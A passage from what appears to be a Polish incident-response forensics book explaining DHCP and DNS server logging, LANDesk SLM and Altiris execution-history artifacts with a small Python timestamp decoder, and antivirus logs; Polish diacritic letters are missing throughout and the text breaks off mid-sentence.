Usuga DHCP firmy Microsoft

Usuga DHCP firmy Microsoft naley do serwerowej linii komercyjnych systemw operacyjnych
Microsoftu. Sposb rejestracji danych w dziennikach przez t usug jest prawie niezmienny od
bardzo dawna zarwno pod wzgldem miejsca przechowywania, jak i rodzaju zapisywanej treci.
W portalu TechNet mona znale oficjaln dokumentacj na ten temat.
W INTERNECIE
technet.microsoft.com/en-us/library/dd183591(v=ws.10).aspx
technet.microsoft.com/en-us/library/dd759178.aspx
W serwerach DHCP Microsoftu funkcja rejestracji danych w dziennikach jest standardowo

wczona. Pliki s zapisywane w postaci tekstowej w katalogu %windir%\System32\Dhcp
(np. C:\Windows\System32\Dhcp). Z czasem firma Microsoft rozszerzya zakres tego dziennika
o kilka pl w porwnaniu z pierwotn wersj. Przyjrzymy si wic dostpnym polom, zaczynajc
od systemu Server 2003, w ktrym jest ich siedem.
ID identyfikator zdarzenia. Opis identyfikatorw zdarze znajduje si na pocztku
dziennika.
Date data zarejestrowania zdarzenia w czasie lokalnym.
Time godzina zarejestrowania zdarzenia w czasie lokalnym.
Description opis zdarzenia.
IP Address adres IP przypisany do hosta.
Host Name nazwa hosta dajcego danego adresu IP.
MAC Address adres MAC hosta dajcego danego adresu IP.
W systemie Windows Server 2008 dodano sze kolejnych pl, co w sumie daje trzynacie.
Oto pola dodane.
User Name,
TransactionID,
QResult,
Probationtime,
CorrelationID,
Dhcid.
W systemie Windows Server 2012 dodano jeszcze pi pl, co w poczeniu z szecioma polami
dodanymi w systemie Server 2008 daje osiemnacie pl:
VendorClass(Hex),
VendorClass(ASCII),
UserClass(Hex),
UserClass(ASCII),
RelayAgentInformation.
Dzienniki DHCP systemw Server 2008 i 2012 zawieraj te informacje wyjaniajce znaczenie
niektrych dodatkowych pl. Poniej znajduje si przykadowy wpis z dziennika serwera DHCP
Microsoftu:
ID,Date,Time,Description,IP Address,Host Name,MAC Address,User Name,
TransactionID, QResult,Probationtime, CorrelationID,Dhcid,
VendorClass(Hex),VendorClass(ASCII),UserClass(Hex),UserClass(ASCII),
RelayAgentInformation.
10,06/18/13,11:22:31,Assign,192.168.44.200,Bob-PC.example.com,08002746BF16,,
1534159513,0,,,,0x4D53465420352E30,MSFT 5.0,,,
Ostrzeenie Naley pamita, e pola daty i godziny w dziennikach Microsoft DHCP zawieraj informacje
w czasie lokalnym! Jak pisalimy wczeniej, czas lokalny to utrapienie specjalistw z zespow
RI, ktrzy zawsze wol mie informacje podawane w standardzie UTC. Poza tym zastosowanie
czasu lokalnego stanowi zamanie zasad panujcych w innych usugach Microsoftu, np. IIS
(ang. Internet Information Services), oraz moe by przyczyn pomyek i trudnoci
w skorelowaniu zdarze.
Od systemu Windows Server 2012 R2 funkcja zapisu danych w dziennikach DHCP jest wczona
domylnie. Jeli jednak nie znajdziesz adnych takich plikw, moesz wczy t funkcj za pomoc
konsoli do zarzdzania usugami DHCP dostpnej w narzdziach administracyjnych w Panelu
sterowania. Wybierz przestrze adresow (np. IPv4), kliknij j prawym przyciskiem i w menu
kontekstowym wybierz pozycj Waciwoci, a nastpnie na karcie Oglne zaznacz pozycj Wcz
rejestrowanie inspekcji DHCP. Jeli opcja ta jest ju wczona, przejd na kart Zaawansowane,
aby sprawdzi ciek do pliku dziennika kto mg zmieni jego domyln lokalizacj.
Jednym z najwikszych problemw zwizanych z dziennikami usugi DHCP jest to, e
domylnie przechowywane s informacje co najwyej sprzed tygodnia. Plikom dziennikw DHCP
nadawane s nazwy wg wzoru DhcpSrvLog-<dzie>.log, gdzie <dzie> to trzyliterowy skrt
angielskiej nazwy dnia tygodnia, np. Mon. Oznacza to, e kadego dnia kasowany jest dziennik
z tego samego dnia sprzed tygodnia dla specjalistw RI to straszna rzecz. W wikszoci
organizacji, dla ktrych pracowalimy, informatycy nie uwaaj, aby przechowywanie dziennikw
usugi DHCP byo wane i w wikszoci wymaga dotyczcych IT jest to akceptowalne. Poniewa
jednak wikszo incydentw pozostaje niewykryta przez duej ni tydzie, naley porozumie si
z dziaem IT, aby zapewni dusze przechowywanie dziennikw usugi DHCP.
To wszystko, jeli chodzi o usug DHCP firmy Microsoft. Teraz przyjrzymy si usudze
DHCP ISC.
Usuga DHCP ISC

Serwer DHCP ISC jest darmowy i ma otwarty kod rdowy. Serwer ten moe dziaa w wielu
systemach operacyjnych, takich jak Linux, BSD, OS X, a nawet Windows. Najczciej spotykamy
go w systemach linuksowych i BSD. Wicej informacji o tym programie i sam aplikacj mona
znale na podanej poniej stronie internetowej.
W INTERNECIE
www.isc.org/downloads/dhcp
W systemach uniksowych serwer DHCP ISC domylnie zapisuje dane do komponentu local7
dziennika systemowego. Aby sprawdzi, gdzie znajduje si odpowiedni plik dziennika lub miejsce
docelowe, naley dowiedzie si, w jaki sposb skonfigurowane jest prowadzenie rejestrw w systemie.
Najczciej wykorzystywanymi usugami rejestracji dziennikw w systemach uniksowych s syslog,
rsyslog oraz syslog-ng. Plik konfiguracyjny standardowej usugi syslog to /etc/syslog.conf, rsyslog is
/etc/rsyslog.conf, a usugi syslog-ng to /etc/syslog-ng.conf. Poszukaj w tym pliku wpisw zawierajcych
sowa local7 facility.
Serwer DHCP ISC normalnie generuje po dwa wpisy w dzienniku na kade danie adresu IP
DHCPDISCOVER i DHCPOFFER. W poniszym przykadzie znajduj si dwa wpisy zwizane z jednym
daniem klienta. Pierwszy wpis wskazuje, e klient o adresie MAC 2e:34:c7:ab:17:03 zada
adresu IP (DHCPDISCOVER). danie to zostao odebrane przez serwer z interfejsu sieciowego
o nazwie re1. Drugi wpis informuje, e serwer poda klientowi adres IP 10.18.0.179 (DHCPOFFER).
Ponadto wpis ten zawiera nazw (Bob-VM) i adres MAC komputera klienta. Poniej znajduj si
omwione wpisy:
Jun 18 11:38:27 dhcpd: DHCPDISCOVER from 2e:34:c7:ab:17:03 via re1
Jun 18 11:38:28 dhcpd: DHCPOFFER on 10.18.0.179 to 2e:34:c7:ab:17:03 (Bob-VM) via re1
Zwr uwag, e data i godzina w wykonanych przez nas testach byy podane w czasie
lokalnym, ale jest to zalene od konfiguracji.
DNS
DNS (ang. Domain Name System) to system, ktrego gwnym zadaniem jest przechowywanie
informacji o nazwach hostw. Dostarcza on wielu rnych informacji, ale najczciej wykorzystuje
si go do wyszukiwania i rozpoznawania nazw hostw. Jeli np. uytkownik wpisze w przegldarce
adres strony internetowej www.example.com, jego komputer najpierw poszuka adresu IP
odpowiadajcego temu adresowi. W tym celu komputer wyle do serwera DNS prob o podanie
tej informacji. Jeli wszystko dziaa normalnie, w cigu okoo sekundy nadejdzie odpowied od
serwera z adresem IP w tym przypadku jest to 93.184.216.119. Posiadajc ten adres, komputer
uytkownika moe zainicjowa poczenie TCP/IP i rozpocz komunikacj. Usuga wyszukiwania
hostw DNS korzysta zazwyczaj z portu UDP 53, a do transferu stref DNS wykorzystywany jest
port TCP 53. Dokadniejsze informacje o protokole DNS mona znale w dokumentach RFC
1034 i 1035.
W INTERNECIE
Proces rozpoznawania nazw DNS jest cennym rdem informacji w ledztwie. Serwer DNS
moe prowadzi dzienniki zawierajce nastpujce dane.
Nazwa hosta, dla ktrego zadano rozpoznawania (zapytanie), np. www.example.com.
Adres IP klienta, ktry zada rozpoznawania.
Wynik rozpoznawania (odpowied), np. 93.184.216.119.
Majc dostp do tych informacji, mona sprawdzi, ktre hosty w rodowisku zostay
zaatakowane metod phishingu za pomoc wiadomoci e-mail zawierajcej odnonik albo znale
hosty z aktywnym szkodliwym oprogramowaniem. Jeli organizacja przechowuje informacje
o rozpoznawaniu DNS przez dugi czas, mona nawet z du dokadnoci okreli cakowity czas
trwania incydentu. Dobre archiwum danych jest szczeglnie wane podczas incydentu, poniewa
wiele domen wykorzystywanych do szkodliwych celw czsto zmienia swoje dane np. adres IP
przechodzi w stan zaparkowania, przez co nazwa hosta jest rozpoznawana jako adres IP lokalnego
hosta (127.0.0.1). Jak ju wielokrotnie pisalimy, wszelkie dane pomocne w ledztwie powinno si
przechowywa w centralnym magazynie.
Berkeley Internet Name Domain (BIND)

W wersji 9. BIND funkcja rejestrowania zapyta jest domylnie wyczona, ale mona j wczy,
dodajc do pliku named.conf.local nastpujcy kod:
logging {
channel query.log {
file "/var/log/query.log";
print-time yes;
severity debug 3;
};
category queries { query.log; };

};
Jeli trzeba, zmie ciek na odpowiedni dla Twojego rodowiska. Nie zapomnij te utworzy
pliku i okreli prawidowych praw wasnoci do niego:
touch /var/log/query.log
chown bind /var/log/query.log
Aby zmiany zostay wprowadzone, naley znw uruchomi serwer BIND. Po ponownym
uruchomieniu program zacznie rejestrowa zapytania przesyane przez klienty DNS w dzienniku
o nazwie query.log. Serwer BIND 9 tworzy wpisy podobne do poniszego:
client 10.18.0.80#42772: query: example.com IN A + (10.18.0.53)
Wpis ten informuje, e klient wysa zapytanie, ktre zawiera zadan nazw hosta. W tym
przypadku dowiadujemy si, e komputer o adresie IP 10.18.0.80 wykona rozpoznawanie DNS
nazwy hosta example.com. Element IN A oznacza, e klient zada adresu IPv4. dania adresw
IPv6 zawieraj rekord IN AAAA.
Jeli dodatkowo chcesz zapisywa w dzienniku odpowiedzi DNS, musisz zwikszy zakres
rejestracji. Aktualnie jedynym sposobem na rejestrowanie odpowiedzi jest wczenie kategorii
domylnej i podniesienie poziomu debugowania do przynajmniej 10. Wiedz jednak, e
spowoduje to wygenerowanie duej iloci danych. Aby wprowadzi opisywane zmiany, naley
doda do pliku named.conf.local poniszy kod i ponownie uruchomi serwer BIND:
logging {
channel resolution.log {
file "/var/log/resolution.log";
print-time yes;
severity debug 10;
};
category default { resolution.log; };
};
Po wprowadzeniu tych zmian serwer BIND bdzie automatycznie dodawa do dziennika

wielowierszowe wpisy zawierajce informacje o odpowiedziach na zapytania. Przykadowo dla
zapytania dotyczcego adresu www.example.com w dzienniku zostan zapisane nastpujce dane
dla ostatniego pakietu odpowiedzi:
10-Mar-2014 10:34:00.480 resquery 0x7f1f4b8b62d0 (fctx
0x7f1f4b8af010(www.example.com/A)): response
10-Mar-2014 10:34:00.480 received packet:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46924
;; flags: qr aa; QUESTION: 1, ANSWER: 2, AUTHORITY: 3, ADDITIONAL: 5
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.example.com. IN A
;; ANSWER SECTION:
www.example.com. 86400 IN A 93.184.216.119
Najwaniejsza cz to w tym przypadku sekcja ANSWER SECTION zawierajca adresy IPv4

znalezione przez serwer DNS dla nazwy www.example.com. Jak si zapewne domylasz, format ten
nie jest idealny do analizy, ale do tego wrcimy troch pniej. Na razie przejdziemy do serwera
DNS firmy Microsoft.
Serwery DNS firmy Microsoft

W serwerach DNS firmy Microsoft funkcja rejestracji zapyta DNS jest domylnie wyczona,
ale mona j wczy za pomoc panelu sterowania serwerem DNS. Procedura jest taka sama
we wszystkich systemach od Windows Server 2003 do 2012. Otwrz Panel sterowania, przejd
do narzdzi administracyjnych i kliknij DNS. Nastpnie kliknij prawym przyciskiem myszy nazw
serwera i wybierz opcj Waciwoci. Pniej kliknij kart Rejestrowanie debugowania i zaznacz
na niej nastpujce pola wyboru:
Rejestruj pakiety do debugowania

Kierunek pakietu:
Przychodzce
Wychodzce
Protok transportowy
UDP
Zawarto pakietu:
Kwerendy/transfery
Typ pakietu:
danie
Odpowied
Aby mona byo przeglda kompletne pakiety odpowiedzi, naley dodatkowo wczy
nastpujc opcj:
Inne opcje:
Szczegy
Musisz jednak wiedzie, e opcja Szczegy powoduje generowanie bardzo duej iloci danych.
Na koniec sprawd jeszcze, czy cieka do pliku dziennika i jego nazwa s prawidowo ustawione
i ustaw maksymalny rozmiar dziennika na podan warto. Jeeli pola te s puste, domylnym
plikiem dziennika jest %systemroot%\system32\dns\dns.txt. Jeli podasz tylko nazw pliku, domylnie
zostanie on zapisany w folderze %systemroot%\system32\dns.
Pamitaj, e po kadym uruchomieniu usugi DNS lub systemu plik dziennika jest tworzony
od nowa (przez co jego stara zawarto zostaje utracona). To samo dzieje si w przypadku, gdy
dziennik przekroczy dozwolony rozmiar. Poniewa nie ma adnego wbudowanego mechanizmu
rotacji dziennika, moe to spowodowa utrat wanych informacji DNS. Poniej znajduje si opis
pl rejestrowanych w dziennikach serwerw DNS firmy Microsoft:
Message logging key (for packets - other items use a subset of these fields):
Field # Information Values
------- ----------- ------
1 Date
2 Time
3 Thread ID
4 Context
5 Internal packet identifier
6 UDP/TCP indicator
7 Send/Receive indicator
8 Remote IP
9 Xid (hex)
10 Query/Response R = Response
blank = Query
11 Opcode Q = Standard Query

N = Notify
U = Update
? = Unknown
12 [ Flags (hex)
13 Flags (char codes) A = Authoritative Answer
T = Truncated Response
D = Recursion Desired
R = Recursion Available
14 ResponseCode ]
15 Question Type
16 Question Name
Jedynym wyjtkiem jest brak pola Internal packet identfier w systemie Server 2003. Pozostae
wystpuj we wszystkich systemach. Podobnie jak usuga DHCP Microsoftu, DNS rejestruje dat
i godzin w czasie lokalnym. Naley o tym pamita podczas przeprowadzania ekspertyz.
Poniej znajduje si przykadowy wpis z dziennika DNS Microsoftu:
6/14/2013 1:59:01 PM 03EC PACKET 00000000027A4070 UDP Snd 10.18.0.80
000a R Q [8081 DR NOERROR] A (7)example(3)com(0)
Gdyby opcja Szczegy bya wczona, w dzienniku pojawiby si nastpujcy wpis:

6/14/2013 1:59:01 PM 03EC PACKET 00000000027A4070 UDP Snd 10.18.0.80
000a R Q [8081 DR NOERROR] A (7)example(3)com(0)
UDP response info at 00000000027A4070
...
QUESTION SECTION:
Offset = 0x000c, RR count = 0
Name "(7)example(3)com(0)"
QTYPE A (1)
QCLASS 1
ANSWER SECTION:
Offset = 0x001d, RR count = 0
Name "[C00C](7)example(3)com(0)"
TYPE A (1)
CLASS 1
TTL 86389
DLEN 4
DATA 192.0.43.10
AUTHORITY SECTION:
empty
ADDITIONAL SECTION:
empty
Zauwa, e i tak usunlimy 22 linijki, ktre zastpilimy wielokropkiem a to tylko dla

jednego zapytania od jednego klienta! Poniewa serwery DNS ISC i Microsoftu sabo sobie radz
z rejestrowaniem odpowiedzi na zapytania DNS, lepszym rozwizaniem jest rejestrowanie
informacji na poziomie sieci. Dalej opisalimy darmowe narzdzie, ktre moe by w tym
pomocne.
Rejestrowanie danych DNS na poziomie sieci

Jak pokazalimy, najwaniejsze serwery DNS nie zapewniaj spjnych funkcji rejestrowania
zapyta i odpowiedzi. Jeli kto chce zapisywa odpowiedzi, musi pogodzi si z tym, e
dodatkowo bdzie zapisywanych wiele innych niepotrzebnych mu informacji. Zarwno w serwerze
BIND 9, jak i serwerach Microsoftu odpowiedzi DNS powoduj zapisanie w dzienniku dziesitek
linii danych, co sprawia, e dzienniki te dochodz do gigantycznych rozmiarw. Utrudnienia te
sprawiaj, e rejestrowanie odpowiedzi DNS na poziomie aplikacyjnym jest w wikszoci
rodowisk niewykonalne.
W przypadkach gdy odpowiedzi DNS s bardzo wane, lepszym rozwizaniem moe by
wykorzystanie rozwizania sieciowego. Jedn z moliwoci jest uycie narzdzia o nazwie
DNSCAP. Program ten suy do monitorowania sieci pod ktem ruchu DNS zapyta,
odpowiedzi lub jednych i drugich. DNSCAP zapisuje ruch DNS w pliku PCAP lub zwraca
komunikat w formacie dig dla kadego wykrytego pakietu DNS. Jeli sie zawiera niewielk liczb
punktw wyjciowych, lepszym rozwizaniem wydaje si zamontowanie specjalnych systemw
przeznaczonych do przechwytywania i rejestrowania ruchu DNS. Wicej informacji o narzdziu
DNSCAP i jego kod rdowy mona znale na podanej niej stronie internetowej.
W INTERNECIE
www.dns-oarc.net/tools/dnscap
APLIKACJE DO ZARZDZANIA
PRZEDSIBIORSTWEM
Wiele firm korzysta z programw do zarzdzania przedsibiorstwem lub narzdzi inwentarskich
pozwalajcych administratorom sprawowa kontrol nad instalowaniem aplikacji w systemach
nalecych do rodowiska. Narzdzia te, z ktrych tylko nieliczne s przeznaczone do monitorowania
sieci, mog dostarczy nam informacji o tym, jakie programy byy uruchamiane w interesujcym
nas systemie. Jako e hakerzy czsto uruchamiaj rne narzdzia i wirusy w zdobytych systemach,
aplikacje zarzdzajce mog da wgld w poczynania tych ludzi.
Cho wiele programw do zarzdzania przedsibiorstwem ma konsol do raportowania
i wdraania, w podrozdziale tym koncentrujemy si na ladach, jakie z pomoc tych aplikacji
mona wydoby z systemu. Moesz otrzyma kopi napdu albo zosta poproszony o zbadanie
rodowiska, w ktrym nie bdzie dostpu do konsoli zarzdzania. W takich przypadkach przyda
Ci si znajomo technik szukania wskanikw zagroenia opisanych w tym podrozdziale.
Opisujemy dwa rozwizania, czyli Software Management Suite firmy LANDesk i Altiris Client
Management Suite firmy Symantec.
Program Software Management Suite firmy LANDesk

Jedn z popularnych aplikacji do zarzdzania magazynem oprogramowania jest Software Management
Suite firmy LANDesk. Cho pakiet ten ma bardzo bogaty zestaw funkcji, nas najbardziej interesuje
skadnik SLM (ang. Software License Monitoring). Zapisuje on informacje dotyczce dziaania
kadej aplikacji w systemie i dostarcza mnstwo cennych informacji, takich jak daty i godziny
uruchamiania aplikacji, atrybuty pliku wykonywalnego oraz nazwa konta uytkownika wykorzystanego
do uruchomienia badanego programu.
Informacje zgromadzone przez program SLM LANDesk pozostaj w systemie nawet po usuniciu
aplikacji. Hakerzy czsto kopiuj do atakowanych systemw rne narzdzia, np. do wykonywania
zrzutu skrtw hase, uruchamiaj je raz, a nastpnie usuwaj. Dowody takiej aktywnoci mona
znale w rejestrach programu SLM nawet wtedy, gdy pliku binarnego dawno ju nie ma w systemie
plikw. Wicej informacji o programie SLM firmy LANDesk mona znale na podanej poniej stronie.
W INTERNECIE
www.landesk.com/products/management-suite
Dalej w tym rozdziale piszemy, jak program SLM przechowuje dane, w jaki sposb mona je
przetwarza, oraz dajemy kilka wskazwek, czego warto szuka. Zaczniemy od omwienia miejsca
przechowywania danych.
Klucze rejestru programu SLM

Pakiet firmy LANDesk zapisuje informacje o uruchamianych programach w gazi rejestru
Windows SOFTWARE pod nastpujcym kluczem: LANDesk\ManagementSuite\WinClient\
SoftwareMonitoring\MonitorLog.
Klucz MonitorLog zawiera po jednym kluczu podrzdnym dla kadej aplikacji, ktra zostaa
uruchomiona w systemie i zarejestrowana przez program SLM. W kadym kluczu aplikacji
znajduj si nastpujce wartoci.
Nazwa atrybutu Opis Typ

Current Duration Ilo czasu (w setkach nanosekund) dziaania programu REG_BINARY
Current User Nazwa uytkownika, ktry ostatnio uruchomi program REG_SZ
First Started Data pierwszego zarejestrowanego uruchomienia programu REG_BINARY
Last Duration Ilo czasu (w setkach nanosekund), przez jak program REG_BINARY
dziaa podczas ostatniego uruchomienia
Last Started Data ostatniego zarejestrowanego uruchomienia programu REG_BINARY
Total Duration Sumaryczny czas wszystkich uruchomie programu REG_BINARY
(w setkach nanosekund)
Total Runs Sumaryczna liczba wszystkich uruchomie programu REG_DWORD
Program SLM rejestruje czas trwania w setkach nanosekund i zapisuje go w postaci danych
binarnych w formacie little-endian w rejestrze. Wartoci First Started i Last Started to struktury
danych Windows FILETIME zapisane w formie binarnej. Poniszy program w jzyku Python zawiera
funkcj decode_filetime konwertujc struktur FILETIME do postaci czytelnej dla czowieka:
import struct
from datetime import datetime
EPOCH_FILETIME = 116444736000000000 # Data 01 stycznia 1970 jako FILETIME

HUNDREDS_NANOSECONDS = 10000000
def decode_filetime(data):
t = (struct.unpack('<Q', data)[0] - EPOCH_FILETIME) / HUNDREDS_NANOSECONDS
return datetime.utcfromtimestamp(t)
Wprawdzie klucze te mona przeglda i konwertowa samodzielnie, ale jest na to lepszy sposb.
W nastpnym podpunkcie zamiecilimy opis kilku metod przetwarzania danych programu SLM.
Przetwarzanie zawartoci klucza MonitorLog

Firma LANDesk utworzya darmowe narzdzie o nazwie SLM Browser, ale dostpna wersja
nie przetwarza wyeksportowanych gazi rejestru. Skoro program ten dziaa tylko na rejestrze
dziaajcego systemu, mona go wykorzystywa do analizy danych na ywo. Wicej informacji
o narzdziu SLM Browser i samo narzdzie mona znale na poniszej stronie.
W INTERNECIE
community.landesk.com/support/docs/DOC-7062
Drugim narzdziem do analizy danych z wybranej gazi rejestru jest wtyczka do programu
RegRipper o nazwie landesk.pl. Jej zalet w porwnaniu z programem SLM Browser jest moliwo
pracy zarwno w dziaajcym systemie, jak i z wyeksportowanym rejestrem. Wtyczka ta powstaa
w 2009 roku i przetwarza tylko pole Last Started z klucza MonitorLog. Justin Prosco opracowa
ulepszon wersj tej wtyczki o nazwie landesk_slm.pl, ktra przetwarza take inne pola i umoliwia
tworzenie lustrzanego odbicia rejestru. Ponadto Prosco utworzy te wersj tego skryptu w Pythonie
o nazwie landesk_slm.py, w ktrej wykorzysta bibliotek python-registry Williego Ballenthina
do przetwarzania kluczy programu SLM. Wszystkie te narzdzia mona pobra z podanych
poniej stron.
W INTERNECIE
RegRipper i landesk.pl code.google.com/p/regripper
Narzdzia rejestrowe Justina Prosco github.com/jprosco/registry-tools
Biblioteka do obsugi rejestru w Pythonie Williego Ballenthina github.com/williballenthin/python-registry
Umiesz ju przetwarza i przeglda dane programu SLM, wic teraz pragniemy przekaza Ci
kilka rad na temat identyfikowania ladw szkodliwej aktywnoci.
Czego szuka
Pakiet SLM umoliwia zbieranie informacji o aplikacjach dziaajcych w sieci. Specjalici ds. RI
mog wykorzysta te dane do szukania dowodw wama. Szuka mona nie tylko znanych nazw
wirusw, ale i innych ladw szkodliwej aktywnoci. Oto one.
Analiza czstotliwoci hakerzy czasami uruchamiaj swoje narzdzia tylko jeden raz
i nastpnie je usuwaj. Na podstawie analizy czstotliwoci uruchamiania programw
mona wykry rzadko uruchamiane programy, ktre mog by wirusami.
Analiza podejrzanych cieek wykonawczych hakerzy czsto do uruchamiania swoich
narzdzi wykorzystuj t sam ciek, np. katalog tymczasowy albo jaki katalog trway.
Przykadowo wysoce podejrzane s wszelkie przypadki uruchomienia programu w Koszu
systemu Windows.
Analiza osi czasu w celu wykrycia daty wamania naley zwraca uwag na uruchomienia
takich systemowych narzdzi jak net.exe, net1.exe, cmd.exe i at.exe. Zwyky uytkownik
rzadko ich potrzebuje, natomiast hakerzy korzystaj z nich bardzo czsto, ale przez krtki
czas. Analiza sposobu uycia tych programw mona dostarczy informacji o ruchach
hakera w obrbie zdobytego systemu.
Identyfikacja podejrzanych nazw uytkownikw za pomoc wartoci Current User
mona zidentyfikowa konto uytkownika, ktre jako ostatnie byo uywane do uruchomienia
okrelonego pliku wykonywalnego. Konta uytkownikw majce niewielk liczb
zarejestrowanych aplikacji mog nalee do hakera i wiadczy o jego ruchach w obrbie
systemu. Sprbuj znale konta, ktre normalnie nie powinny mie dostpu do systemu
oraz szukaj dowodw wiadczcych o tym, e byy uruchamiane programy. Szczegln
uwag zwr na to, jakie aplikacje s wykonywane za pomoc kont o wysokich
uprawnieniach, np. administratorw domen.
Identyfikacja plikw wykonywalnych, ktrych nie ma ju w systemie plikw program
SLM zapisuje cieki do plikw wykonywalnych, dziki ktrym mona si dowiedzie,
jakie pliki zostay usunite. Cho legalne aplikacje, takie jak instalatory, mog wykonywa
i usuwa tymczasowe pliki wykonywalne, analiza tych danych czasami pozwala wykry
szkodliw dziaalno w systemie.
Teraz przyjrzymy si programowi Altiris Client Management Suite firmy Symantec.
Program Altiris Client Management Suite firmy Symantec

Innym popularnym programem do zarzdzania punktami kocowymi dla przedsibiorstw jest
pakiet Altiris Client Management Suite firmy Symantec. Pakiet ten zawiera opcjonalny skadnik
do mierzenia aplikacji, ktry podobnie jak SLM firmy LANDesk rejestruje histori
wykonywania aplikacji w systemie. Administratorzy zazwyczaj wykorzystuj funkcje mierzenia
aplikacji do monitorowania wydajnoci, ale jej dzienniki pozwalaj te znale dowody wamania
do systemu. Wicej informacji o pakiecie Altiris Client Management Suite firmy Symantec mona
znale na podanej poniej stronie internetowej:
W INTERNECIE
www.symantec.com/client-management-suite?fid=endpoint-management
Zobaczmy, do czego Altiris moe przyda si w ledztwie. Najbardziej przydatny artefakt,

jaki odkrylimy, to dziennik AeXAMInventory. W dwch kolejnych podpunktach opisujemy
jego zawarto oraz przedstawiamy kilka porad na temat moliwych sposobw wykorzystania.
Dzienniki metryczne programu Altiris

Magazyn programu Altiris ma posta pliku, z wartociami rozdzielanymi tabulatorami (TSV),
o nazwie AeXAMInventory.txt, ktry jest bardzo atwy do przetwarzania. cieka do tego pliku
moe by rna, ale miejsce instalacji programu mona znale w kluczu rejestru
HKLM\SOFTWARE\Altiris\Altiris Agent\InstallDir.
Dzienniki te zawieraj znacznie wicej informacji o plikach wykonywalnych uruchamianych
w systemie ni klucze rejestru zapisywane przez program SLM firmy LANDesk. Narzdzie Altiris
Application Metering Agent analizuje informacj o wersji plikw PE i zapisuje te dane w dzienniku,
ktry jest niezmiernie cenny dla kadego, kto szuka szkodliwego oprogramowania lub innych plikw
o okrelonych atrybutach wersji. Pliki dziennika AeXAMInventory.txt wystpuj w rnych formatach,
poniewa w wersji 7.0 produktu wprowadzono nowe pola, np. do zapisywania rozmiaru pliku i skrtu
MD5 rejestrowanego programu. Plik AeXAMInventory.txt nie zawiera wiersza nagwkowego
pozwalajcego zorientowa si, co zawieraj kolumny. W poniszej tabeli znajduje si opis pl
zaczerpnity z podrcznika uytkownika programu Altiris Application Metering.
Nazwa Opis
Manufacturer Informacje o wersji PE: producent
Internal Name Informacje o wersji PE: nazwa wewntrzna
File Version Informacje o wersji PE: wersja pliku
File Name Nazwa pliku
Product Name Informacje o wersji PE: nazwa produktu
Known As Informacje o wersji PE: nazwa wewntrzna
User Konto uytkownika, za pomoc ktrego po raz ostatni uruchomiono program
Domain Domena, do ktrej naley konto, za pomoc ktrego po raz ostatni
uruchomiono program
Discovered Data pierwszego uruchomienia
Last Start Data ostatniego uruchomienia
Nazwa Opis
Month Year Miesic i rok ostatniego okresu monitorowania, w ktrym program by uruchamiany
Run Count Liczba zarejestrowanych uruchomie programu w okresie monitorowania
Denial Count Liczba odmw uruchomienia programu w ostatnim okresie monitorowania
Total Run Time Sumaryczny czas (w sekundach) dziaania programu w ostatnim okresie
monitorowania
Peak Memory Najwiksza ilo pamici (w bajtach) wykorzystana przez program w ostatnim
okresie monitorowania
Avg CPU Usage rednie procentowe wykorzystanie procesora przez program w ostatnim
okresie monitorowania
Month End Warto logiczna okrelajca, czy aktualny zestaw danych na temat aplikacji
Summary jest ostateczny dla danego miesica
W INTERNECIE
www.symantec.com/business/support/index?page=content&id=DOC4729
Administrator moe wybiera, ktre pola chce mie rejestrowane, ale spotkalimy si tylko
kilka razy z sytuacj, gdy kto zmieni ustawienia domylne.
Wiesz ju, czego si spodziewa w dziennikach programu Altiris, wic teraz podpowiemy,
jak skutecznie wykorzysta te informacje w dochodzeniu.
Czego szuka
Techniki przetwarzania dziennikw programu Altiris s takie same jak dla programu SLM.
Poniewa jednak pliki te zawieraj wicej danych, mona z nich wydoby troch wicej informacji.
Identyfikacja plikw wykonywalnych bez informacji o wersji twrcy szkodliwych programw
czsto usuwaj ze swoich plikw wykonywalnych wszelkie dane identyfikacyjne, takie jak np.
informacja o wersji. Uniemoliwia to aplikacjom posugujcym si sygnaturami, takim jak
programy antywirusowe i systemy wykrywania wama, identyfikowanie tych plikw za pomoc
sygnatur. Agent metryczny programu Altiris rejestruje informacje o wersji z nagwkw PE,
a jeli dany plik tych informacji nie zawiera, w przeznaczonym na nie polu pozostawia puste
miejsce. Wprawdzie niektre legalne aplikacje rwnie mog by pozbawione informacji o wersji,
ale i tak jest to bardzo dobry punkt startowy do poszukiwania nieznanych szkodliwych programw.
Identyfikacja podejrzanych plikw wykonywalnych na podstawie rozmiaru pliku
szkodliwe oprogramowanie, szczeglnie typu backdoor i narzdzia, czsto ma rozmiar
poniej jednego megabajta. S to do proste aplikacje, z reguy pozbawione rozbudowanego
interfejsu uytkownika i mechanizmw obsugi bdw, jakie stosuje si w komercyjnych
programach. Ponadto haker moe zainstalowa ten sam backdoor pod rnymi nazwami
w rnych miejscach rodowiska. Jednak mimo zmiany nazwy pliku jego rozmiar pozostaje
taki sam, dziki czemu bardzo atwo go znale w dziennikach.
PROGRAMY ANTYWIRUSOWE
Programy antywirusowe w rodowiskach korporacyjnych mona spotka wszdzie. Rzadko si
zdarza, abymy musieli bada systemy pozbawione jakiegokolwiek antywirusa. Aplikacje te czsto
s bardzo wanym rdem dowodw, poniewa zapisuj wiele cennych informacji w dziennikach
i rejestruj wszelkie lady szkodliwej aktywnoci. W podrozdziale tym opisujemy rodzaje dowodw
generowane przez trzy najwaniejsze pakiety oprogramowania antywirusowego.
Ostrzeenie Oprogramowanie antywirusowe rzadko wykrywa wszystkie programy, jakie haker prbuje
zainstalowa w systemie. Czasami hakerzy uruchamiaj normalne narzdzia systemowe, ktre
nie s uwaane za szkodliwe, albo uywaj aplikacji bez sygnatur, ktrych nie da si wykry.
Dlatego program antywirusowy moe wykry cz programw uruchomionych przez hakera
lub wszystkie, ale moe te si zdarzy, e nie wykryje adnego. Dzienniki programw
antywirusowych s cennym rdem informacji, lecz nie mona ich traktowa jako kompletnych.
Piszemy o tym, poniewa wiele organizacji nadmiernie polega na tym, co znajdzie lub czego
nie znajdzie w dziennikach antywirusw.
Kwarantanna programu antywirusowego

Wikszo pakietw antywirusowych zawiera specjalny mechanizm likwidacji zagroe o nazwie
kwarantanna. Gdy program wykrywa co podejrzanego, moe zakodowa ten plik i przenie go
w specjalne miejsce na dysku. Plik znajdujcy si w kwarantannie nie moe by uruchamiany,
dopki nie zostanie z niej wyprowadzony. Przydatno kwarantanny polega na tym, e programy
antywirusowe czasami si myl i uznaj za wirusy nieszkodliwe pliki. W takiej sytuacji uytkownik
